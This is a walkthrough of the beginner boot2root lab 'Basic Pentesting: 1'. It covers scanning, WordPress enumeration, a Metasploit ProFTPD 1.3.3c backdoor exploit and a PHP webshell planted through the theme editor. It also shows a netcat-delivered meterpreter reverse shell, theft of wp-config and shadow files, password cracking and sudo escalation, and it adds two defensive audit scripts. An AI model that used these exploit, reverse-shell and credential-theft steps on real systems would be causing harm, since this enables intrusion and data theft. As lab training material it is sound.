As suggested by its name, Basic Pentesting: 1 is a boot2root for beginners. Its description says that it contains numerous vulnerabilities and priv esc routes, so this walkthrough may be updated as I try to go back and identify them all. You can find the file here. The VM was created for VirtualBox, but I found it to work with VMware, too. The only time that there seems to be an issue is when you try to power off the target. But if you take a snapshot of the VM before you start working on it (something I suggest anyway so that you can always return the target to a pristine state), then this is not a problem.
Scanning
The first step is to find the target machine. We’ll accomplish this with arp-scan, which broadcasts ARP requests on the local network and prints any responses.
Starting arp-scan 1.9 with 32 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.10.7.1 00:50:56:c0:00:01 VMware, Inc.
10.10.7.9 00:0c:29:6a:43:65 VMware, Inc.
10.10.7.30 00:50:56:e2:d6:46 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 32 hosts scanned in 2.077 seconds (15.41 hosts/sec). 3 responded
As the only hosts running on my lab network are my kali box and the target, our target must be located at 10.10.7.9.
At this point, note that the creator suggests adding the host to your /etc/hosts file, and this is important to do. Add the following line to /etc/hosts (change the IP to match your network):
The next step is to determine which ports are open, using nmap.
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating ARP Ping Scan at 10:03
Scanning 10.10.7.9 [1 port]
Completed ARP Ping Scan at 10:03, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:03
Scanning vtcsec (10.10.7.9) [65535 ports]
Discovered open port 21/tcp on 10.10.7.9
Discovered open port 80/tcp on 10.10.7.9
Discovered open port 22/tcp on 10.10.7.9
Completed SYN Stealth Scan at 10:03, 3.89s elapsed (65535 total ports)
Initiating Service scan at 10:03
Scanning 3 services on vtcsec (10.10.7.9)
Completed Service scan at 10:03, 9.93s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against vtcsec (10.10.7.9)
NSE: Script scanning 10.10.7.9.
Initiating NSE at 10:03
Completed NSE at 10:03, 24.19s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Nmap scan report for vtcsec (10.10.7.9)
Host is up (0.00029s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:6A:43:65 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 76.603 days (since Thu Oct 19 20:35:32 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms vtcsec (10.10.7.9)
NSE: Script Post-scanning.
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.27 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65555 (2.623MB)
nmap reports three open ports: 21, 22 and 80.
Port 21
There is an FTP server listening on port 21. nmap informs us that the service is likely ProFTPD 1.3.3c.
Port 22
There is an SSH service listening on port 22. nmap informs us that it is likely OpenSSH 7.2p2 Ubuntu 4ubuntu2.2. This is also a pretty good indicator that our target is running Ubuntu.
Port 80
There is an HTTP server listening on port 80. It is likely Apache httpd 2.4.18.
Visiting the site shows a default Apache page.
Following my standard procedure for web servers, I next started nikto and dirb scans.
nikto
---------------------------------------------------------------------------
+ Target IP: 10.10.7.9
+ Target Hostname: 10.10.7.9
+ Target Port: 80
+ Start Time: 2018-01-04 10:03:59 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7517 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2018-01-04 10:04:20 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
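The three missing headers and the ETag line in the nikto output above are the kind of findings a defender should both verify and fix. The script below is an added example, not part of the original walkthrough or of nikto: it audits a raw HTTP response for those headers and decodes the ETag. The response it checks is a constructed sample modelled on this target (Apache 2.4.18, a 177-byte index page, which is the 0xb1 nikto printed as the first ETag field). nikto's "leaks inodes" message fires on any multi-field ETag; when the first field equals the Content-Length, as here, the ETag is the Apache 2.4 size-mtime form and carries no inode.

```python
import re

# Constructed sample modelled on the nikto and dirb output above (Apache 2.4.18,
# a 177-byte = 0xb1 index page, none of the three hardening headers).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    'ETag: "b1-55e1c7758dcdb"\r\n'
    "Content-Length: 177\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>It works!</h1></body></html>\r\n"
)

# Header -> predicate accepting a hardened value; absent or weak both count.
HARDENING_HEADERS = {
    "x-frame-options": lambda v: v.upper() in ("DENY", "SAMEORIGIN"),
    "x-content-type-options": lambda v: v.lower() == "nosniff",
    "x-xss-protection": lambda v: v.split(";")[0].strip() in ("0", "1"),
}

ETAG_RE = re.compile(r'^(?:W/)?"([0-9a-f]+(?:-[0-9a-f]+){1,2})"$', re.I)

def parse_headers(raw):
    """Return {lowercase-name: value} for the header block of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def classify_etag(etag, content_length):
    """Apache 2.2 and earlier default to INode Size MTime (three hex fields);
    2.4 defaults to Size MTime (two).  nikto reports any multi-field ETag as an
    inode leak, so the first field is compared with Content-Length instead."""
    m = ETAG_RE.match(etag)
    if not m:
        return "opaque"
    fields = m.group(1).split("-")
    if len(fields) == 3:
        return "inode-size-mtime"
    if content_length is not None and int(fields[0], 16) == int(content_length):
        return "size-mtime"
    return "unknown-2-field"

def audit(raw):
    """Return sorted findings for one raw HTTP response."""
    headers = parse_headers(raw)
    findings = []
    for name, ok in HARDENING_HEADERS.items():
        if name not in headers:
            findings.append(f"missing {name}")
        elif not ok(headers[name]):
            findings.append(f"weak {name}: {headers[name]}")
    if any(ch.isdigit() for ch in headers.get("server", "")):
        findings.append(f"server version disclosed: {headers['server']}")
    if "etag" in headers:
        kind = classify_etag(headers["etag"], headers.get("content-length"))
        if kind == "inode-size-mtime":
            findings.append("etag exposes inode (set FileETag MTime Size)")
        else:
            findings.append(f"etag format {kind}: no inode leak")
    return sorted(findings)

if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print("[!]", finding)
```

On a live server the same audit can be fed the output of a raw request (for example `curl -si http://vtcsec/`); the version disclosure goes away with `ServerTokens Prod` and the headers are added with `Header always set`.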
dirb
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 4 10:04:04 2018
URL_BASE: http://10.10.7.9/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.7.9/ ----
+ http://10.10.7.9/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://10.10.7.9/secret/
+ http://10.10.7.9/server-status (CODE:403|SIZE:297)
---- Entering directory: http://10.10.7.9/secret/ ----
+ http://10.10.7.9/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/
==> DIRECTORY: http://10.10.7.9/secret/wp-content/
==> DIRECTORY: http://10.10.7.9/secret/wp-includes/
+ http://10.10.7.9/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.10.7.9/secret/wp-admin/ ----
+ http://10.10.7.9/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/css/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/images/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/includes/
+ http://10.10.7.9/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/js/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/maint/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/network/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/user/
---- Entering directory: http://10.10.7.9/secret/wp-content/ ----
+ http://10.10.7.9/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-content/plugins/
==> DIRECTORY: http://10.10.7.9/secret/wp-content/themes/
---- Entering directory: http://10.10.7.9/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/network/ ----
+ http://10.10.7.9/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.7.9/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-admin/user/ ----
+ http://10.10.7.9/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.7.9/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-content/plugins/ ----
+ http://10.10.7.9/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-content/themes/ ----
+ http://10.10.7.9/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
nikto and dirb both indicate the existence of a secret directory at /secret/. Furthermore, the files and directories discovered by dirb suggest that /secret/ hosts a WordPress site. Visiting the page quickly confirms this, so we will run a scan to enumerate the site.
wpscan
[+] Started: Thu Jan 4 10:52:46 2018
[!] The WordPress 'http://10.10.7.9/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.7.9/secret/xmlrpc.php
[!] Includes directory has directory listing enabled: http://10.10.7.9/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 4 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
Time: 00:00:02 <=======================> (1600 / 1600) 100.00% Time: 00:00:02
[+] No plugins found
[+] Enumerating installed themes (only ones with known vulnerabilities) ...
Time: 00:00:00 <=========================> (283 / 283) 100.00% Time: 00:00:00
[+] No themes found
[+] Enumerating timthumb files ...
Time: 00:00:02 <=======================> (2541 / 2541) 100.00% Time: 00:00:02
[+] No timthumb files found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------------------+
| Id | Login | Name |
+----+-------+-------------------+
| 1 | admin | admin – My secret |
+----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Thu Jan 4 10:53:03 2018
[+] Requests Done: 4514
[+] Memory used: 113.613 MB
[+] Elapsed time: 00:00:16
By specifying the -e flag, the tool tries to determine the WordPress version, any running plugins, installed themes, etc., and returns known vulnerabilities for them. It also identified a user named admin (at the bottom of the script’s output).
wpscan can also be used to brute-force logins to WordPress sites, but since admin is a default user, let’s first see if we can just log in using admin as the password, too.
Success!
Vulnerability Analysis
FTP
Searchsploit indicates that this version of ProFTPD had its source backdoored, and better yet, there is a Metasploit module for the exploit. This will definitely be worth investigating.
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution | exploits/linux/remote/16921.rb
--------------------------------------------- ----------------------------------
SSH
Not much to see here. There is a vulnerability in this version of OpenSSH that allows username enumeration, but since we are likely to get a shell through either FTP or HTTP, I’m marking this as “check last”.
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration (PoC) | exploits/linux/remote/40113.txt
--------------------------------------------- ----------------------------------
HTTP
There are no apparent vulnerabilities associated with our version of Apache. But since we are logged in to the WordPress site, we can leverage our access to get a webshell. We’ll explore this in the HTTP portion of Exploitation below.
Exploitation
FTP
Using searchsploit earlier, we learned that there is a Metasploit module to exploit the backdoor built into this version of ProFTPD. We can quickly find it using search:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution
Now that we’ve identified the module, we load it and set the various options (you can always use show options if you’re unsure of what they are, or want to verify that they are correctly configured).
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 10.10.7.5
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 10.10.7.5
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 10.10.7.9
Our payload is ready. Execute it with run and wait a few seconds. Metasploit will connect to the FTP server and trigger the backdoor to execute our payload, giving us a shell on the target machine. Once it is established, we quickly improve the environment with our python one-liner and check our current user.
[*] Started reverse TCP handler on 10.10.7.5:4444
[*] 10.10.7.9:21 - Sending Backdoor Command
[*] Command shell session 1 opened (10.10.7.5:4444 -> 10.10.7.9:42556) at 2018-01-04 12:03:51 -0700
python -c 'import pty; pty.spawn("/bin/bash")'
root@vtcsec:/# whoami
whoami
root
root@vtcsec:/#
We have root! At this point, we’ve owned the machine and can do whatever we want to do. But let’s explore the web shell route.
HTTP
To get a webshell, we go to the theme editor, which allows us to directly edit the PHP code of the various pages in the installed themes. In order to avoid causing any problems with the site (and, in theory, avoid instant detection), we will edit a page in a theme that is not in use. Kali has a number of web shells built in at /usr/share/webshells/. The most feature-filled PHP shell seems to be qsd-php-backdoor.php. If we replace the content of one of the .php pages in our unused theme (I am editing 404.php in the Twenty Fifteen theme) with the content of the qsd backdoor, then we should be able to navigate to this page and see our webshell. EDIT: After completing this machine, I remembered another PHP web shell that I had run across on another boot2root that is very well done and definitely worth adding to your kit. It emulates a bash environment directly in your browser, making it far more useful than qsd in my mind. It can be found here.
The question is where this file is located, and dirb gives us a hint: it found a directory at /secret/wp-content/themes/. We know the name of our theme and the name of our page, so it’s fairly simple to guess the rest of the URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/404.php
We now have a web shell on the target and can run almost any command that we want to as www-data.
Post Exploitation
Improving our environment
An interactive shell is better than a web shell, though, so now that we can run commands on the target, let’s improve our working environment by using it to transfer an msfvenom payload to the target and get a meterpreter shell.
First, generate the payload:
While our payload is generating we need to get metasploit ready to handle the incoming meterpreter connection:
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.7.5
lhost => 10.10.7.5
msf exploit(multi/handler) > set lport 52822
lport => 52822
msf exploit(multi/handler) > run
Once generated, we need to transfer the msfvenom payload to the target machine. There are many ways to do this; I generally choose netcat as the simplest. On the Kali box, prep our netcat listener to transmit the payload:
In the webshell, enter the following command and execute it. The command will connect to our Kali box and save anything transmitted (our msfvenom payload) to a file in /tmp/ called rshell. It will then change the permissions to allow the payload to be executed, and execute it. We need to ensure that both our Metasploit handler and our nc listener on the Kali box are running, as the command connects to both of them.
If the command is successful, we should see two things: a successful connection to our nc listener, and an incoming meterpreter connection. The expected output for both is shown below:
listening on [any] 52800 ...
connect to [10.10.7.5] from vtcsec [10.10.7.9] 56908
sent 207, rcvd 0
[*] Started reverse TCP handler on 10.10.7.5:52822
[*] Sending stage (857352 bytes) to 10.10.7.9
[*] Meterpreter session 2 opened (10.10.7.5:52822 -> 10.10.7.9:57618) at 2018-01-04 12:28:30 -0700
meterpreter >
Privilege Escalation
Now that we have a meterpreter session on the target, it’s time to do some further reconnaissance. There is a good tool that can automate some of this for us called linuxprivchecker.py (available here). We can use meterpreter to upload this file to our target, and then use the shell to execute it:
meterpreter > channel -i 1
www-data@vtcsec:/tmp$ python linuxprivchecker.py > linuxprivchecker.out
When the script has completed running, we can background our shell with ctrl+z and download the output for easier viewing. While we’re at it, let’s grab a few other interesting files.
meterpreter > download /var/www/html/secret/wp-config.php /root/Documents/vtcsec/
meterpreter > download /etc/passwd /root/Documents/vtcsec/
meterpreter > download /etc/group /root/Documents/vtcsec/
Looking in wp-config.php, we can find some database credentials that may come in handy: username root, password arootmysqlpass.
One thing that stands out in the output of linuxprivchecker is the fact that /etc/shadow is readable, so let’s grab that as well!
Inside /etc/shadow, we can see a password hash for the user marlinspike. Let’s use john to try to crack it.
john unshadowed
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-01-04 10:04) 12.50g/s 100.0p/s 100.0c/s 100.0C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Weak passwords ftw! We can now log in as this user and stop acting as www-data. Do this either via SSH or simply using su in our current meterpreter session.
We can check which commands, if any, our new user is allowed to run with sudo:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL
It seems our user is able to run any command with sudo. That means we should be able to switch user to root:
root
We now have root!
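The two findings this escalation turned on, a world-readable /etc/shadow and an unrestricted sudo rule, are easy to check for on a host you administer. The script below is an added example, not part of the original walkthrough or of linuxprivchecker.py: it parses captured `sudo -l` text (the marlinspike output above, embedded as a constructed sample) and tests a file's mode bits, using a temporary file in place of /etc/shadow so it runs without privileges.

```python
import os
import re
import stat
import tempfile

# Constructed sample: the `sudo -l` output for marlinspike quoted above.
SAMPLE_SUDO_L = r"""Matching Defaults entries for marlinspike on vtcsec:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marlinspike may run the following commands on vtcsec:
    (ALL : ALL) ALL
"""

# One sudo rule as `sudo -l` prints it: "(runas[ : group]) [TAG: ...] commands"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def shadow_is_exposed(path):
    """True if the file is readable by 'other'.  On Ubuntu /etc/shadow is
    0640 root:shadow, so group read is expected; world read is the exposure
    linuxprivchecker flagged on this box."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)

def parse_sudo_rules(text):
    """Return (runas, tags, commands) for each rule line in `sudo -l` output.
    Only lines after 'may run the following commands' are rules; the Defaults
    block is skipped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append((m["runas"].strip(), m["tags"].strip(), m["cmds"].strip()))
    return rules

def unrestricted_sudo(text):
    """Rules that let the user run any command as root or as any user."""
    hits = []
    for runas, tags, cmds in parse_sudo_rules(text):
        target = runas.split(":")[0].strip()
        if cmds == "ALL" and target in ("ALL", "root"):
            hits.append((runas, tags, cmds))
    return hits

def audit(shadow_path, sudo_l_text):
    """Collect the findings for one host as human-readable strings."""
    findings = []
    if shadow_is_exposed(shadow_path):
        findings.append(f"{shadow_path} is world-readable: password hashes exposed")
    for runas, tags, cmds in unrestricted_sudo(sudo_l_text):
        rule = " ".join(p for p in (f"({runas})", tags, cmds) if p)
        findings.append(f"sudo rule '{rule}' grants full root")
    return findings

def make_sample_file(mode):
    """Create a throwaway file with the given mode to stand in for /etc/shadow."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    os.chmod(path, mode)
    return path

if __name__ == "__main__":
    demo = make_sample_file(0o644)        # the misconfigured case from the box
    for finding in audit(demo, SAMPLE_SUDO_L):
        print("[!]", finding)
    os.unlink(demo)
```

On a real host, run it as root with `/etc/shadow` and the output of `sudo -l -U <user>`; the fixes are `chmod 0640 /etc/shadow` and replacing the blanket ALL rule with the specific commands the account needs.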
There appear to be some other vulnerabilities present as well. Linuxprivchecker.py seemed to think that the MySQL service running could be used to priv esc to root, however when I checked it did not appear to be running with root privileges (a requirement for the exploit to work), so I did not try it. I also noticed that ImageMagick-6 seems to be installed. This has a lot of vulnerabilities associated with it and would be worth investigating. But we can sudo su, so I will leave it there for now.